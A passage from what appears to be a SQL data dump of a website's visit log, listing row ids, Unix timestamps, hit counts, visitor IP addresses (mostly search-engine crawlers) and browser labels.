64.28','chrome'),(465531,1575132397,2,2,0,0,'207.46.13.81','other'),(465532,1575132689,1,1,0,0,'207.46.13.28','other'),(465533,1575132950,1,1,0,0,'66.249.70.36','chrome'),(465534,1575133199,1,1,0,0,'8.29.198.27','other'),(465535,1575133441,1,1,0,0,'66.249.64.28','chrome'),(465536,1575134091,1,1,0,0,'207.46.13.81','other'),(465537,1575134539,1,1,0,0,'107.178.89.254','chrome'),(465538,1575134661,2,2,0,0,'66.249.64.27','chrome'),(465539,1575135259,1,1,0,0,'157.55.39.179','other'),(465540,1575135776,1,1,0,0,'66.249.64.27','chrome'),(465541,1575137180,1,1,0,0,'87.250.224.104','other'),(465542,1575137259,1,1,0,0,'66.249.70.33','chrome'),(465543,1575137317,3,3,0,0,'66.249.64.28','chrome'),(465544,1575137467,1,1,0,0,'66.249.64.27','chrome'),(465545,1575137912,3,2,1,0,'66.249.70.62',''),(465546,1575138122,1,1,0,0,'157.55.39.179','other'),(465547,1575138324,1,1,0,0,'148.163.72.236','chrome'),(465548,1575138420,1,1,0,0,'66.249.64.26','chrome'),(465549,1575138641,1,1,0,0,'157.55.39.66','other'),(465550,1575138785,1,1,0,0,'85.209.90.125','chrome'),(465551,1575139011,1,1,0,0,'148.163.70.87','chrome'),(465552,1575139502,1,1,0,0,'66.249.64.27','chrome'),(465553,1575139831,1,1,0,0,'194.60.254.17','chrome'),(465554,1575140485,1,1,0,0,'207.46.13.81','other'),(465555,1575140558,1,1,0,0,'107.167.75.164','chrome'),(465556,1575140863,1,1,0,0,'66.249.64.28','chrome'),(465557,1575141617,1,1,0,0,'66.249.70.36','chrome'),(465558,1575141637,1,1,0,0,'66.249.70.33','chrome'),(465559,1575141771,1,1,0,0,'8.29.198.27','other'),(465560,1575142321,1,1,0,0,'148.163.123.94','chrome'),(465561,1575142474,2,2,0,0,'66.249.64.26','chrome'),(465562,1575142908,1,1,0,0,'207.46.13.28','other'),(465563,1575143119,1,1,0,0,'148.163.72.183','chrome'),(465564,1575144035,2,2,0,0,'66.249.64.28','chrome'),(465565,1575144067,1,1,0,0,'8.29.198.27','other'),(465566,1575144070,1,1,0,0,'157.55.39.66','other'),(465567,1575144281,2,2,0,0,'66.249.64.26','chrome'),(465568,1575144614,1,1,0,0,'66.249.70.33','chrome'),(465569,1575145543,1,1,0,0,'157.55.39.66','other'),(465570,1575145629,1,1,0,0,'66.249.64.28','chrome'),(465571,1575147536,1,1,0,0,'66.249.64.28','chrome'),(465572,1575147780,1,1,0,0,'141.8.132.9','other'),(465573,1575148502,2,2,0,0,'66.249.64.27','chrome'),(465574,1575148577,1,1,0,0,'66.249.64.28','chrome'),(465575,1575148795,1,1,0,0,'207.46.13.28','other'),(465576,1575149380,1,1,0,0,'107.178.93.31','chrome'),(465577,1575150036,1,1,0,0,'107.178.112.162','chrome'),(465578,1575150256,1,1,0,0,'217.69.143.217','firefox'),(465579,1575150993,2,2,0,0,'207.46.13.81','other'),(465580,1575151210,2,2,0,0,'66.249.64.27','chrome'),(465581,1575151503,1,1,0,0,'157.55.39.66','other'),(465582,1575152550,1,1,0,0,'107.178.89.193','chrome'),(465583,1575152575,1,1,0,0,'217.66.159.132','chrome'),(465584,1575152633,1,1,0,0,'8.29.198.25','other'),(465585,1575153223,1,1,0,0,'37.9.113.33','other'),(465586,1575153320,1,1,0,0,'157.55.39.66','other'),(465587,1575153833,1,1,0,0,'148.163.70.115','chrome'),(465588,1575154015,1,1,0,0,'207.46.13.81','other'),(465589,1575154463,1,1,0,0,'66.249.64.26','chrome'),(465590,1575154875,1,1,0,0,'66.249.64.27','chrome'),(465591,1575154885,1,1,0,0,'148.163.70.87','chrome'),(465592,1575154920,1,1,0,0,'8.29.198.26','other'),(465593,1575155820,1,1,0,0,'66.249.64.27','chrome'),(465594,1575156261,1,1,0,0,'66.249.64.28','chrome'),(465595,1575157034,1,1,0,0,'207.46.13.28','other'),(465596,1575157349,1,1,0,0,'148.163.72.84','chrome'),(465597,1575158366,1,1,0,0,'148.163.70.245','chrome'),(465598,1575158585,1,1,0,0,'54.236.36.54','chrome'),(465599,1575159570,1,1,0,0,'66.249.64.27','chrome'),(465600,1575159880,1,1,0,0,'148.163.70.245','chrome'),(465601,1575161010,1,1,0,0,'66.249.64.26','chrome'),(465602,1575161052,1,1,0,0,'66.249.70.62','chrome'),(465603,1575161139,1,1,0,0,'66.249.64.27','chrome'),(465604,1575161178,1,1,0,0,'148.163.72.16','chrome'),(465605,1575161605,1,1,0,0,'141.8.142.128','other'),(465606,1575161947,1,1,0,0,'66.249.64.26','chrome'),(465607,1575162439,1,1,0,0,'107.167.92.83','chrome'),(465608,1575162809,1,1,0,0,'17.58.101.25','other'),(465609,1575163027,1,1,0,0,'37.9.113.33','other'),(465610,1575163431,1,1,0,0,'107.167.94.238','chrome'),(465611,1575163500,1,1,0,0,'8.29.198.25','other'),(465612,1575163553,1,1,0,0,'148.163.72.155','chrome'),(465613,1575163608,1,1,0,0,'66.249.70.62','chrome'),(465614,1575163859,1,1,0,0,'157.55.39.134','other'),(465615,1575163886,1,1,0,0,'148.163.72.134','chrome'),(465616,1575163952,1,1,0,0,'107.167.89.201','chrome'),(465617,1575164607,1,1,0,0,'66.249.64.27','chrome'),(465618,1575165168,1,1,0,0,'148.163.72.207','chrome'),(465619,1575165635,1,1,0,0,'66.249.64.27','chrome'),(465620,1575165701,1,1,0,0,'35.161.223.219','other'),(465621,1575165768,1,1,0,0,'8.29.198.27','other'),(465622,1575166000,1,1,0,0,'148.163.123.67','chrome'),(465623,1575166963,1,1,0,0,'141.8.142.119','other'),(465624,1575167053,1,1,0,0,'157.55.39.134','other'),(465625,1575167131,1,1,0,0,'87.250.224.104','other'),(465626,1575167854,1,1,0,0,'66.249.70.62','chrome'),(465627,1575168233,1,1,0,0,'66.249.64.26','chrome'),(465628,1575168243,1,1,0,0,'207.46.13.247','other'),(465629,1575168661,1,1,0,0,'66.249.70.36','chrome'),(465630,1575170518,1,1,0,0,'66.249.64.27','chrome'),(465631,1575170755,1,1,0,0,'66.249.64.26','chrome'),(465632,1575171550,2,2,0,0,'66.249.64.27','chrome'),(465633,1575172294,1,1,0,0,'141.8.142.128','other'),(465634,1575172454,1,1,0,0,'178.154.200.33','other'),(465635,1575173055,2,2,0,0,'157.55.39.66','other'),(465636,1575173748,1,1,0,0,'37.9.113.97','other'),(465637,1575174361,1,1,0,0,'8.29.198.27','other'),(465638,1575174726,1,1,0,0,'157.55.39.73','other'),(465639,1575175871,1,1,0,0,'66.249.64.27','chrome'),(465640,1575176611,1,1,0,0,'8.29.198.25','other'),(465641,1575176803,2,2,0,0,'66.249.64.26','chrome'),(465642,1575179035,1,1,0,0,'66.249.64.28','chrome'),(465643,1575179060,2,2,0,0,'172.241.112.83','other'),(465644,1575179089,1,1,0,0,'66.249.64.27','chrome'),(465645,1575179172,1,1,0,0,'66.249.64.26','chrome'),(465646,1575180791,1,1,0,0,'66.249.64.28','chrome'),(465647,1575181424,2,2,0,0,'66.249.64.26','chrome'),(465648,1575181579,1,1,0,0,'141.8.183.18','other'),(465649,1575181891,1,1,0,0,'207.46.13.177','other'),(465650,1575182114,1,1,0,0,'207.46.13.247','other'),(465651,1575182486,1,0,1,0,'66.249.70.62',''),(465652,1575183012,1,1,0,0,'141.8.188.25','other'),(465653,1575183496,1,1,0,0,'37.147.234.199','msie'),(465654,1575183535,1,1,0,0,'66.249.70.36','chrome'),(465655,1575184109,1,1,0,0,'207.46.13.177','other'),(465656,1575184308,4,4,0,0,'88.99.2.203','other'),(465657,1575184327,2,2,0,0,'136.243.70.68','other'),(465658,1575184530,1,1,0,0,'66.249.64.26','chrome'),(465659,1575184654,1,1,0,0,'66.249.64.28','chrome'),(465660,1575185213,1,1,0,0,'8.29.198.26','other'),(465661,1575185346,1,1,0,0,'207.46.13.177','other'),(465662,1575185958,2,2,0,0,'66.249.64.27','chrome'),(465663,1575186212,1,0,1,0,'66.249.64.26',''),(465664,1575186721,1,1,0,0,'39.98.127.242','other'),(465665,1575187036,2,2,0,0,'66.249.64.26','chrome'),(465666,1575187163,1,1,0,0,'207.46.13.253','other'),(465667,1575187460,1,1,0,0,'8.29.198.27','other'),(465668,1575187814,3,3,0,0,'66.249.64.27','chrome'),(465669,1575188064,3,3,0,0,'66.249.64.26','chrome'),(465670,1575188159,1,1,0,0,'66.249.70.62','chrome'),(465671,1575188463,1,1,0,0,'66.249.70.33','chrome'),(465672,1575188704,1,1,0,0,'157.55.39.73','other'),(465673,1575189005,1,1,0,0,'207.46.13.177','other'),(465674,1575190819,1,1,0,0,'66.249.64.27','chrome'),(465675,1575191508,1,1,0,0,'88.99.2.203','other'),(465676,1575191655,1,1,0,0,'207.46.13.247','other'),(465677,1575192189,1,1,0,0,'66.249.70.36','chrome'),(465678,1575193087,1,1,0,0,'207.46.13.177','other'),(465679,1575193746,1,1,0,0,'66.249.64.28','chrome'),(465680,1575194057,1,1,0,0,'66.249.64.27','chrome'),(465681,1575194865,1,1,0,0,'66.249.70.36','chrome'),(465682,1575195416,1,1,0,0,'66.249.64.27','chrome'),(465683,1575195610,4,4,0,0,'66.249.64.26','chrome'),(465684,1575196060,1,1,0,0,'8.29.198.25','other'),(465685,1575196068,3,3,0,0,'66.249.64.28','chrome'),(465686,1575196131,1,1,0,0,'66.249.70.62','chrome'),(465687,1575196265,1,1,0,0,'207.46.13.247','other'),(465688,1575196278,1,1,0,0,'218.30.103.129','other'),(465689,1575196909,1,1,0,0,'66.249.64.26','chrome'),(465690,1575197044,1,1,0,0,'141.8.188.20','other'),(465691,1575197121,1,1,0,0,'66.249.70.62','chrome'),(465692,1575197383,1,1,0,0,'207.46.13.177','other'),(465693,1575197425,2,2,0,0,'66.249.64.27','chrome'),(465694,1575197484,2,2,0,0,'66.249.70.36','chrome'),(465695,1575197488,2,2,0,0,'66.249.64.28','chrome'),(465696,1575198108,1,1,0,0,'66.249.64.26','chrome'),(465697,1575198321,1,1,0,0,'8.29.198.25','other'),(465698,1575199053,1,1,0,0,'66.249.64.28','chrome'),(465699,1575199385,1,1,0,0,'109.74.154.72','chrome'),(465700,1575199648,1,1,0,0,'5.45.207.43','other'),(465701,1575199686,3,3,0,0,'66.249.64.26','chrome'),(465702,1575199786,1,1,0,0,'207.46.13.247','other'),(465703,1575199890,2,2,0,0,'66.249.64.27','chrome'),(465704,1575200127,2,2,0,0,'157.55.39.143','other'),(465705,1575200631,1,1,0,0,'66.249.64.28','chrome'),(465706,1575201438,1,1,0,0,'66.249.64.27','chrome'),(465707,1575202472,2,2,0,0,'66.249.70.36','chrome'),(465708,1575202486,2,2,0,0,'66.249.64.27','chrome'),(465709,1575202541,2,2,0,0,'66.249.64.26','chrome'),(465710,1575203049,2,2,0,0,'66.249.64.28','chrome'),(465711,1575203461,1,1,0,0,'66.249.64.27','chrome'),(465712,1575204710,2,2,0,0,'66.249.64.27','chrome'),(465713,1575205005,1,1,0,0,'141.8.188.25','other'),(465714,1575205024,1,1,0,0,'95.108.213.39','other'),(465715,1575205122,1,1,0,0,'66.249.64.28','chrome'),(465716,1575206025,1,1,0,0,'66.249.64.27','chrome'),(465717,1575206075,2,2,0,0,'66.249.64.26','chrome'),(465718,1575206286,1,1,0,0,'141.8.142.132','other'),(465719,1575206932,1,1,0,0,'8.29.198.27','other'),(465720,1575207126,1,1,0,0,'31.13.127.21','other'),(465721,1575207127,2,2,0,0,'31.13.127.20','other'),(465722,1575207129,1,1,0,0,'31.13.127.22','other'),(465723,1575207295,1,1,0,0,'66.249.70.62','chrome'),(465724,1575207948,2,2,0,0,'66.249.64.28','chrome'),(465725,1575208362,1,1,0,0,'157.55.39.108','other'),(465726,1575208881,1,1,0,0,'66.249.64.27','chrome'),(465727,1575209166,1,1,0,0,'8.29.198.26','other'),(465728,1575209398,1,1,0,0,'31.13.127.17','other'),(465729,1575209399,1,1,0,0,'31.13.127.13','other'),(465730,1575209813,1,1,0,0,'66.249.64.27','chrome'),(465731,1575210359,1,1,0,0,'66.249.64.26','chrome'),(465732,1575210871,3,3,0,0,'66.249.64.28','chrome'),(465733,1575212565,2,2,0,0,'66.249.64.28','chrome'),(465734,1575212607,1,1,0,0,'157.55.39.108','other'),(465735,1575212910,2,2,0,0,'66.249.70.33','chrome'),(465736,1575212960,1,1,0,0,'66.249.70.36','chrome'),(465737,1575213956,1,1,0,0,'213.180.203.37','other'),(465738,1575214001,1,1,0,0,'178.154.200.71','other'),(465739,1575215245,1,1,0,0,'178.154.200.33','other'),(465740,1575215400,2,2,0,0,'66.249.70.62','chrome'),(465741,1575215412,5,5,0,0,'66.249.64.27','chrome'),(465742,1575215483,3,3,0,0,'66.249.64.26','chrome'),(465743,1575216890,2,2,0,0,'66.249.64.28','chrome'),(465744,1575217106,1,1,0,0,'66.249.64.27','chrome'),(465745,1575217788,1,1,0,0,'8.29.198.27','other'),(465746,1575218064,2,2,0,0,'66.249.64.28','chrome'),(465747,1575218773,1,1,0,0,'66.249.70.62','chrome'),(465748,1575219246,1,1,0,0,'66.249.70.36','chrome'),(465749,1575219329,1,1,0,0,'66.249.64.26','chrome'),(465750,1575219637,1,1,0,0,'13.66.139.0','other'),(465751,1575220036,1,1,0,0,'8.29.198.25','other'),(465752,1575220587,3,3,0,0,'66.249.70.33','chrome'),(465753,1575220754,1,1,0,0,'157.55.39.9','other'),(465754,1575221240,1,1,0,0,'66.249.64.28','chrome'),(465755,1575221387,1,1,0,0,'95.28.50.246','chrome'),(465756,1575222402,1,1,0,0,'66.249.70.36','chrome'),(465757,1575222439,1,1,0,0,'66.249.64.27','chrome'),(465758,1575224249,2,2,0,0,'66.249.64.28','chrome'),(465759,1575224253,3,3,0,0,'66.249.64.27','chrome'),(465760,1575224295,1,1,0,0,'66.249.70.33','chrome'),(465761,1575224815,1,1,0,0,'66.249.64.26','chrome'),(465762,1575225923,1,1,0,0,'66.249.64.28','chrome'),(465763,1575225943,1,1,0,0,'178.154.200.13','other'),(465764,1575225953,1,1,0,0,'157.55.39.9','other'),(465765,1575226268,1,1,0,0,'66.249.70.33','chrome'),(465766,1575226306,3,3,0,0,'66.249.64.26','chrome'),(465767,1575226993,2,2,0,0,'66.249.64.27','chrome'),(465768,1575227681,1,1,0,0,'178.133.244.218','chrome'),(465769,1575227867,1,1,0,0,'66.249.64.26','chrome'),(465770,1575227979,1,1,0,0,'66.249.64.28','chrome'),(465771,1575228650,1,1,0,0,'8.29.198.27','other'),(465772,1575228866,1,1,0,0,'66.249.70.36','chrome'),(465773,1575229073,1,1,0,0,'213.180.203.44','other'),(465774,1575230128,1,1,0,0,'157.55.39.9','other'),(465775,1575230882,1,1,0,0,'8.29.198.27','other'),(465776,1575231002,1,1,0,0,'66.249.64.27','chrome'),(465777,1575231416,1,1,0,0,'213.180.203.44','other'),(465778,1575231626,1,1,0,0,'66.249.70.62','chrome'),(465779,1575231950,1,1,0,0,'157.55.39.9','other'),(465780,1575232423,2,2,0,0,'47.254.83.208','other'),(465781,1575232879,4,4,0,0,'66.249.64.27','chrome'),(465782,1575233087,1,1,0,0,'213.180.203.44','other'),(465783,1575233452,1,1,0,0,'85.209.90.125','chrome'),(465784,1575233558,1,1,0,0,'13.66.139.0','other'),(465785,1575234109,1,1,0,0,'157.55.39.9','other'),(465786,1575234486,1,1,0,0,'66.249.70.62','chrome'),(465787,1575235306,2,2,0,0,'66.249.64.28','chrome'),(465788,1575235747,1,1,0,0,'66.249.64.27','chrome'),(465789,1575236084,1,1,0,0,'207.46.13.128','other'),(465790,1575236116,1,1,0,0,'157.55.39.9','other'),(465791,1575236434,1,1,0,0,'66.249.64.26','chrome'),(465792,1575237363,1,1,0,0,'213.180.203.44','other'),(465793,1575237831,1,1,0,0,'207.46.13.240','other'),(465794,1575237974,1,1,0,0,'66.249.64.27','chrome'),(465795,1575238006,1,1,0,0,'95.135.237.27','msie'),(465796,1575238506,4,4,0,0,'66.249.64.28','chrome'),(465797,1575238737,1,1,0,0,'207.46.13.128','other'),(465798,1575238969,1,1,0,0,'66.249.70.36','chrome'),(465799,1575239114,1,1,0,0,'66.249.64.26','chrome'),(465800,1575239511,1,1,0,0,'8.29.198.27','other'),(465801,1575239518,1,1,0,0,'66.249.64.27','chrome'),(465802,1575240730,2,2,0,0,'66.249.64.27','chrome'),(465803,1575240800,1,1,0,0,'66.249.64.28','chrome'),(465804,1575241724,1,1,0,0,'8.29.198.27','other'),(465805,1575242240,1,1,0,0,'66.249.64.27','chrome'),(465806,1575242453,1,1,0,0,'213.180.203.44','other'),(465807,1575243764,1,1,0,0,'66.249.64.26','chrome'),(465808,1575244264,1,1,0,0,'66.249.64.28','chrome'),(465809,1575245766,1,1,0,0,'66.249.64.28','chrome'),(465810,1575245879,1,1,0,0,'66.249.70.62','chrome'),(465811,1575246149,1,1,0,0,'66.249.70.33','chrome'),(465812,1575246166,1,1,0,0,'207.46.13.33','other'),(465813,1575246220,1,1,0,0,'66.249.64.27','chrome'),(465814,1575246674,1,1,0,0,'66.249.64.28','chrome'),(465815,1575249176,3,3,0,0,'213.180.203.44','other'),(465816,1575250363,1,1,0,0,'8.29.198.27','other'),(465817,1575251082,1,1,0,0,'66.249.64.27','chrome'),(465818,1575251979,1,1,0,0,'213.180.203.44','other'),(465819,1575252570,1,1,0,0,'8.29.198.27','other'),(465820,1575252644,1,1,0,0,'207.46.13.33','other'),(465821,1575252847,1,1,0,0,'66.249.64.26','chrome'),(465822,1575252943,1,1,0,0,'207.46.13.128','other'),(465823,1575253243,1,1,0,0,'66.249.64.28','chrome'),(465824,1575253715,1,1,0,0,'207.46.13.246','other'),(465825,1575253888,1,1,0,0,'66.249.70.62','chrome'),(465826,1575254262,1,1,0,0,'66.249.70.36','chrome'),(465827,1575254594,1,1,0,0,'213.180.203.44','other'),(465828,1575254699,3,3,0,0,'66.249.64.26','chrome'),(465829,1575256214,3,3,0,0,'66.249.64.27','chrome'),(465830,1575256314,1,1,0,0,'66.249.64.26','chrome'),(465831,1575256360,2,2,0,0,'66.249.64.28','chrome'),(465832,1575257188,1,1,0,0,'66.249.70.36','chrome'),(465833,1575257197,1,1,0,0,'213.180.203.44','other'),(465834,1575257347,3,3,0,0,'66.249.64.26','chrome'),(465835,1575257759,3,3,0,0,'66.249.64.28','chrome'),(465836,1575258587,1,1,0,0,'207.46.13.128','other'),(465837,1575258663,1,1,0,0,'213.180.203.44','other'),(465838,1575258837,1,1,0,0,'66.249.64.28','chrome'),(465839,1575259728,1,1,0,0,'66.249.70.36','chrome'),(465840,1575260363,1,1,0,0,'207.46.13.8','other'),(465841,1575260553,2,2,0,0,'66.249.75.66','chrome'),(465842,1575261227,1,1,0,0,'8.29.198.25','other'),(465843,1575261777,1,1,0,0,'207.46.13.159','other'),(465844,1575262762,1,1,0,0,'66.249.75.68','chrome'),(465845,1575262825,2,2,0,0,'66.249.75.64','chrome'),(465846,1575262842,1,1,0,0,'66.249.69.97','chrome'),(465847,1575262845,1,1,0,0,'66.249.75.66','chrome'),(465848,1575263191,1,1,0,0,'207.46.13.33','other'),(465849,1575263409,1,1,0,0,'8.29.198.26','other'),(465850,1575263740,2,2,0,0,'213.180.203.44','other'),(465851,1575263849,2,2,0,0,'207.46.13.8','other'),(465852,1575264261,1,1,0,0,'66.249.75.64','chrome'),(465853,1575264740,1,1,0,0,'66.249.75.66','chrome'),(465854,1575265530,2,2,0,0,'66.249.75.64','chrome'),(465855,1575267016,1,1,0,0,'66.249.75.68','chrome'),(465856,1575267100,1,1,0,0,'157.55.39.128','other'),(465857,1575267412,1,1,0,0,'66.249.75.66','chrome'),(465858,1575268107,1,1,0,0,'66.249.75.68','chrome'),(465859,1575268751,1,1,0,0,'207.46.13.8','other'),(465860,1575268771,1,1,0,0,'46.211.245.129','chrome'),(465861,1575268773,2,2,0,0,'66.102.9.161','chrome'),(465865,1575268779,3,3,0,0,'66.249.83.201','chrome'),(465866,1575268786,4,4,0,0,'66.249.83.197','chrome'),(465868,1575268880,1,1,0,0,'66.249.88.161','chrome'),(465869,1575268882,2,2,0,0,'66.102.9.164','chrome'),(465870,1575268886,1,1,0,0,'66.249.88.191','chrome'),(465872,1575269441,2,2,0,0,'66.249.83.199','chrome'),(465873,1575269460,1,1,0,0,'66.249.88.164','chrome'),(465874,1575269951,3,3,0,0,'66.249.75.66','chrome'),(465875,1575270327,1,1,0,0,'213.180.203.44','other'),(465876,1575270630,1,1,0,0,'66.249.75.68','chrome'),(465877,1575271002,1,1,0,0,'46.33.245.142','chrome'),(465878,1575271544,2,2,0,0,'213.180.203.44','other'),(465879,1575272078,1,1,0,0,'8.29.198.26','other'),(465880,1575272424,2,2,0,0,'66.249.75.68','chrome'),(465881,1575272875,1,1,0,0,'207.46.13.8','other'),(465882,1575272908,3,3,0,0,'213.180.203.44','other'),(465883,1575272990,1,1,0,0,'66.249.69.97','chrome'),(465884,1575273111,1,1,0,0,'66.249.75.66','chrome'),(465885,1575273414,2,2,0,0,'66.249.75.64','chrome'),(465886,1575273562,1,1,0,0,'207.46.13.159','other'),(465887,1575273681,3,3,0,0,'66.249.75.68','chrome'),(465888,1575273871,1,1,0,0,'128.90.170.238','chrome'),(465889,1575274248,1,1,0,0,'8.29.198.26','other'),(465890,1575274256,1,1,0,0,'207.46.13.120','other'),(465891,1575274388,1,1,0,0,'37.53.228.106','chrome'),(465892,1575274638,1,1,0,0,'66.249.69.100','chrome'),(465893,1575274846,3,3,0,0,'66.249.75.68','chrome'),(465894,1575274967,2,2,0,0,'66.249.75.64','chrome'),(465895,1575274985,1,1,0,0,'195.10.210.70','chrome'),(465897,1575275033,1,1,0,0,'207.46.13.8','other'),(465898,1575275107,1,1,0,0,'91.196.178.72','firefox'),(465899,1575275315,1,1,0,0,'91.196.178.85','chrome'),(465900,1575276907,1,1,0,0,'213.180.203.44','other'),(465901,1575277234,1,1,0,0,'157.55.39.8','other'),(465902,1575277273,2,2,0,0,'66.249.75.68','chrome'),(465903,1575278179,1,1,0,0,'213.180.203.44','other'),(465904,1575278181,1,1,0,0,'66.249.75.64','chrome'),(465905,1575278394,2,2,0,0,'66.249.75.66','chrome'),(465906,1575278725,1,1,0,0,'91.196.178.85','chrome'),(465907,1575279130,1,1,0,0,'66.249.75.68','chrome'),(465908,1575279384,1,1,0,0,'66.249.75.64','chrome'),(465909,1575279430,3,3,0,0,'66.249.75.66','chrome'),(465910,1575279482,1,1,0,0,'100.27.34.240','chrome'),(465911,1575279497,2,2,0,0,'207.46.13.159','other'),(465912,1575279671,1,1,0,0,'157.55.39.8','other'),(465913,1575280141,1,1,0,0,'51.38.63.63','firefox'),(465914,1575280679,1,1,0,0,'66.249.75.68','chrome'),(465915,1575281265,1,1,0,0,'66.249.69.97','chrome'),(465916,1575281755,2,2,0,0,'66.249.75.64','chrome'),(465917,1575282266,1,1,0,0,'157.55.39.8','other'),(465918,1575282277,1,1,0,0,'213.180.203.44','other'),(465919,1575282296,1,1,0,0,'207.46.13.120','other'),(465920,1575282310,1,1,0,0,'66.249.75.66','chrome'),(465921,1575282368,1,1,0,0,'66.249.75.68','chrome'),(465922,1575282937,1,1,0,0,'8.29.198.27','other'),(465923,1575283547,1,1,0,0,'66.249.69.100','chrome'),(465924,1575283709,1,1,0,0,'66.249.75.64','chrome'),(465925,1575283943,2,2,0,0,'207.46.13.120','other'),(465926,1575284327,1,1,0,0,'78.26.198.254','chrome'),(465927,1575284471,1,1,0,0,'66.249.75.66','chrome'),(465928,1575284749,2,2,0,0,'66.249.75.64','chrome'),(465929,1575284960,1,1,0,0,'188.165.255.126','msie'),(465930,1575285079,1,1,0,0,'207.46.13.8','other'),(465931,1575285086,1,1,0,0,'8.29.198.25','other'),(465932,1575285151,1,1,0,0,'109.74.154.72','chrome'),(465933,1575285699,1,1,0,0,'66.249.69.97','chrome'),(465934,1575285705,2,2,0,0,'66.249.75.64','chrome'),(465935,1575286036,1,1,0,0,'66.249.69.126','chrome'),(465936,1575286327,1,1,0,0,'66.249.75.68','chrome'),(465937,1575286593,1,1,0,0,'66.249.69.100','chrome'),(465938,1575287048,1,0,1,0,'176.62.76.13',''),(465939,1575287441,1,1,0,0,'207.46.13.120','other'),(465940,1575287888,1,1,0,0,'213.180.203.44','other'),(465941,1575288505,1,1,0,0,'157.55.39.226','other'),(465942,1575288929,1,1,0,0,'66.249.75.68','chrome'),(465943,1575289008,1,1,0,0,'66.249.75.64','chrome'),(465944,1575291094,2,2,0,0,'66.249.75.66','chrome'),(465945,1575292028,1,1,0,0,'213.180.203.44','other'),(465946,1575292105,1,1,0,0,'66.249.75.64','chrome'),(465947,1575292166,1,1,0,0,'91.196.178.85','chrome'),(465948,1575292692,1,1,0,0,'66.249.69.126','chrome'),(465949,1575293005,1,1,0,0,'207.46.13.12','other'),(465950,1575293143,1,1,0,0,'91.196.178.85','chrome'),(465951,1575293810,1,1,0,0,'8.29.198.25','other'),(465952,1575294769,1,1,0,0,'66.249.75.64','chrome'),(465953,1575294978,1,1,0,0,'31.223.2.73','chrome'),(465954,1575295215,1,1,0,0,'91.124.236.19','chrome'),(465955,1575295960,1,1,0,0,'8.29.198.25','other'),(465956,1575296247,1,1,0,0,'66.249.75.68','chrome'),(465957,1575296466,1,1,0,0,'66.249.75.64','chrome'),(465958,1575297475,1,1,0,0,'91.196.178.84','chrome'),(465959,1575301251,1,1,0,0,'66.249.75.68','chrome'),(465960,1575301964,1,1,0,0,'66.249.75.66','chrome'),(465961,1575302126,3,3,0,0,'37.17.172.157','other'),(465962,1575302164,3,3,0,0,'37.17.172.158','other'),(465963,1575302201,3,3,0,0,'37.17.172.148','other'),(465964,1575302240,3,3,0,0,'37.17.172.149','other'),(465965,1575302278,3,3,0,0,'37.17.172.150','other'),(465966,1575302318,3,3,0,0,'37.17.172.151','other'),(465967,1575302356,3,3,0,0,'37.17.172.152','other'),(465968,1575302394,3,3,0,0,'37.17.172.153','other'),(465969,1575302431,3,3,0,0,'37.17.172.154','other'),(465970,1575302469,3,3,0,0,'37.17.172.155','other'),(465971,1575302548,2,2,0,0,'45.118.134.43','other'),(465972,1575303286,1,1,0,0,'37.17.172.157','other'),(465973,1575303323,1,1,0,0,'37.17.172.158','other'),(465974,1575304247,1,1,0,0,'213.180.203.44','other'),(465975,1575304605,1,1,0,0,'66.249.75.68','chrome'),(465976,1575304677,1,1,0,0,'8.29.198.25','other'),(465977,1575304689,1,1,0,0,'66.249.75.64','chrome'),(465978,1575305258,1,1,0,0,'213.180.203.44','other'),(465979,1575305279,1,1,0,0,'85.209.90.125','chrome'),(465980,1575305578,1,1,0,0,'157.55.39.226','other'),(465981,1575306113,2,2,0,0,'81.177.183.77','firefox'),(465982,1575306115,1,1,0,0,'81.177.183.77','chrome'),(465983,1575306827,1,1,0,0,'8.29.198.26','other'),(465984,1575307636,1,1,0,0,'207.46.13.12','other'),(465985,1575308106,1,1,0,0,'213.180.203.44','other'),(465986,1575308190,1,1,0,0,'66.249.75.66','chrome'),(465987,1575309547,1,1,0,0,'157.55.39.226','other'),(465988,1575309584,1,1,0,0,'66.249.75.64','chrome'),(465989,1575309759,1,1,0,0,'66.249.75.68','chrome'),(465990,1575310120,1,1,0,0,'5.58.154.27','firefox'),(465991,1575310600,1,1,0,0,'66.249.69.126','chrome'),(465992,1575311218,1,1,0,0,'91.196.178.59','chrome'),(465993,1575311725,1,0,1,0,'66.249.69.100',''),(465994,1575312108,1,1,0,0,'128.71.169.80','chrome'),(465995,1575312235,1,1,0,0,'66.249.75.64','chrome'),(465996,1575312440,2,2,0,0,'45.118.134.43','other'),(465997,1575312486,1,1,0,0,'91.196.178.129','chrome'),(465998,1575312523,1,1,0,0,'91.196.178.65','firefox'),(465999,1575313666,1,1,0,0,'207.46.13.128','other'),(466000,1575313742,1,1,0,0,'46.211.148.227','chrome'),(466001,1575314038,1,1,0,0,'66.249.75.64','chrome'),(466002,1575314292,1,1,0,0,'157.55.39.206','other'),(466003,1575315329,1,1,0,0,'91.196.178.48','chrome'),(466004,1575315543,1,1,0,0,'8.29.198.27','other'),(466005,1575315607,1,1,0,0,'130.180.211.199','chrome'),(466006,1575315634,1,1,0,0,'213.180.203.44','other'),(466007,1575316075,1,1,0,0,'91.196.178.35','chrome'),(466008,1575317201,1,1,0,0,'213.180.203.44','other'),(466009,1575317697,1,1,0,0,'8.29.198.25','other'),(466010,1575317978,2,2,0,0,'66.249.75.68','chrome'),(466011,1575318059,2,2,0,0,'95.213.141.126','opera'),(466012,1575318665,1,1,0,0,'94.153.97.239','chrome'),(466013,1575318669,1,1,0,0,'91.196.178.188','chrome'),(466014,1575318821,1,0,1,0,'66.249.75.66',''),(466015,1575319982,1,1,0,0,'176.98.69.152','firefox'),(466016,1575320755,25,25,0,0,'194.34.133.197','chrome'),(466017,1575320799,1,1,0,0,'66.249.75.68','chrome'),(466018,1575321214,1,0,1,0,'66.249.75.64',''),(466019,1575321303,1,1,0,0,'66.249.69.126','chrome'),(466020,1575324957,1,1,0,0,'207.46.13.128','other'),(466021,1575326421,1,1,0,0,'8.29.198.26','other'),(466022,1575326673,1,1,0,0,'66.249.75.64','chrome'),(466023,1575326982,1,1,0,0,'167.71.167.108','other'),(466024,1575327489,1,1,0,0,'66.249.75.68','chrome'),(466025,1575328554,1,1,0,0,'8.29.198.27','other'),(466026,1575328767,1,1,0,0,'157.55.39.206','other'),(466027,1575328800,1,1,0,0,'66.249.75.66','chrome'),(466028,1575329300,2,2,0,0,'66.249.75.64','chrome'),(466029,1575330057,1,1,0,0,'66.249.69.97','chrome'),(466030,1575330799,1,1,0,0,'66.249.75.64','chrome'),(466031,1575330801,2,2,0,0,'207.46.13.12','other'),(466032,1575331171,1,1,0,0,'157.55.39.206','other'),(466033,1575331190,1,1,0,0,'15.188.14.